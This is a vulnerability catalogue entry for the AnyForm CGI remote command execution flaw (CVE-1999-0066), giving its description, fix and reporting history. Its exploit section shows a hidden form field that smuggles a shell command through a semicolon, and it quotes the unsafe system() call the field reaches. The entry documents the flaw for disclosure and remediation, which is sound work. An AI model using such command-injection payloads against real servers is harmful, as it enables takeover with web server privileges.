AnyForm

Vulnerability Description

Brief description: AnyForm allows arbitrary commands to be run

Full description: AnyForm passes form data to a system call without performing sanity checks. There is virtually no error checking and neither you or the user will likely receive any indication of a failure if the address entered is not correct.

Components: Affected versions: all versions Affected Platform: Common Gateway Interface (CGI)

Systems:

Effect(s) of exploiting: This allows the attacker to run commands with the privileges of the web server

Detecting the hole:

Fixing the hole:

    1. Disable access or execute permission to the AnyForm version 2 script and upgrade to AnyForm version 3 or greater.

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0066 -- AnyForm CGI remote execution

Exploit Information

Attack: To exploit, create a form with a hidden field something like this: 

<input type="hidden" name="AnyFormTo" value="foo@bar.com;command-to-execute
with whatever arguments;/usr/lib/sendmail -t foo@bar.com ">
Then submit the form to the AnyForm CGI on the server to be attacked. The value of this parameter is passed to this code: 
  SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
  system(SystemCommand);
Since system() invokes a shell, the semicolons are treated as command delimeters and anything can be inserted.

Related Information

THe AnyForm web page is at the University of Kentucky.

Advisories: ISS X-Force database entry http-cgi-anyform ; Bugtraq letter from Paul Phillips

Related Vulnerabilities:

Reportage

Reporting: Paul Phillips in Bugtraq (Mon Jul 31 1995 21:26:51 )

Revision Number 1

  1. Stacey Anderson (6/26/2000):
    Initial entry